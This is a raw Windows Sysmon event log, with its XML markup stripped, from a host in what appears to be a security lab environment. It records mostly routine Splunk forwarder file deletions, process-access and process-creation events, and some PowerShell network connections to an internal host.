Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1F34E587B937C0244A28CEC0BCB0DD3A,SHA256=3039D3EB2D1EAE0379171FC206EDCCC7E6B5875FDE7D0FC5C058AB7120A72107,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:02.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7CCC15C7AA23E72E154CD8BD7D6119F,SHA256=389416D31BD7C46D023B939B027A4DA1737E54134CD48F7B093AB169D42C61FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:03.884{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECA75C89B3CE7488446B2E205B0267CF,SHA256=608AF7C84AEC5213FFE1717569C1202ED715F59B100D58396C8BAE395DD127A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:04.914{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4611529EF7AB85DECCFAD143DFC1D570,SHA256=31898CE1A92E44EC8CE150D04CA5A868CECB0A773B60198B9425B06B8916B69E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:05.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E19BEE13DD8E8E1D71D2C19D70E426E,SHA256=D1A8EE515338F30D78676FA4723FD6ACEE37AAD22F38D4EED43ABC2598F2F210,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:06.966{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF22996EFCCE151EFCD84EAFF324824D,SHA256=5C2EE35CEAF9DE9EED39AEE21B658FF8D4310247333F9B96293CCA19DD2855F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:06.213{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=910CC6B4D3578D7E07A8DB5D4AAE6D27,SHA256=6DD9346E2C53CFB0909ED672B7E551C2015D14FFD095231980BDBF347327C559,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:07.981{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C47B145FB3145F5145AE8F8B939AFB06,SHA256=FA6853C2E80D1A8F50E474140C2D3EF764BFC061B973821DEDD4EBFB4D399787,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:32.093{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56496-false10.0.1.12-8000- 354300x800000000000000035083594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:31.210{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56495-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:09.026{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31FC17B945DAC0386F8156318B76EFAA,SHA256=74658ACF2D843153FA2D341CC22874B9D91B0656C4534BCC380813FCADBAE8EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:10.043{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55DB71AC607AF1F362BD12564A00C930,SHA256=2E523CBA6D67B38F5A6018C6B54CC7F0025D7ECA9E41A23CAB5BD1C68E4F9F30,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:36.222{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56497-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:11.446{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4B483FC8C781EDFC9BBE51BC71D78271,SHA256=527BFCF54AB87B43B0649E0DEC3FFCF94F4C08CB255BD2B6EE4A0393BD140FEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083599Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:11.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBBE135E7EA88EC0012ACAF61A461692,SHA256=3C484BB7AE3921E7AF557CE1BB0ED5083B755D913A82860CE22D55E23534CE6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:12.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3136D54A6485B4BEF222DDD84332F9C7,SHA256=97AC58AD21A6598A272832A0533577DACA28501C338C017E8F8498EC4F822152,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083613Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:37.258{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56498-false10.0.1.12-8000- 10341000x800000000000000035083612Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.564{B81B27B7-4D15-613A-1990-03000000C801}65245860C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083611Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D15-613A-1990-03000000C801}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083610Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083606Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4D15-613A-1990-03000000C801}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083605Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.395{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D15-613A-1990-03000000C801}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.381{B81B27B7-4D15-613A-1990-03000000C801}6524C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:13.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D470447D1C157224725E6C2DB30E9A0F,SHA256=38D49AAF9A39CD390F0D6818EF8DCB918FDC7EF29315190690D345ECDCBA45FF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083624Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B986B9817F38BAE92E83A227B66494E,SHA256=18E146EE176A7A677F40FA28EE4F4E4C8F0A59169C21D1180A97D9ED39B62037,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083623Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D7A53021D58B0FE07B23FA4E6B8A98DC,SHA256=F22DD8FE764888D171583F2EEB700D99231F6247C37063980F43385B6E2D6143,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083622Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.126{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA31B9F9C41EC3A3416F26F222412A95,SHA256=27CDE109711C326C607485C64A117A8BE09DC842D12EB3F2360F333599A780BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083621Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D16-613A-1A90-03000000C801}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083620Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083619Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083618Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083617Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083616Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D16-613A-1A90-03000000C801}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083615Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.094{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D16-613A-1A90-03000000C801}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083614Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:14.080{B81B27B7-4D16-613A-1A90-03000000C801}2940C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083625Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:15.129{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 